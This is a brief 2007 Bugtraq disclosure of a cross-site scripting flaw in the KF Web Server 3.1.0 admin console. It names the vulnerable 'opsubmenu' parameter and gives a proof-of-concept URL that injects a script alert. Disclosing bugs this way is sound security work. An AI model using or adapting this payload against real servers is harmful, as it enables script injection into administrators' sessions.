[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
KF Web Server 3.1.0 admin console XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: KF Web Server 3.1.0 admin console XSS
- From: imprili@xxxxxxxxx
- Date: 23 Jun 2007 19:18:37 -0000
KF Web Server 3.1.0 admin console XSS
--------------------------------------
site:http://www.keyfocus.net/kfws/
parameter:opsubmenu
poc
---
http://127.0.0.1:9727/index.wkf?opmenu=0&opsubmenu=aaaa%22%3E%3Cscript%
3Ealert('xss');%3C/script%3E
bug found by: Shay Priel aka Prili - imprili@xxxxxxxxx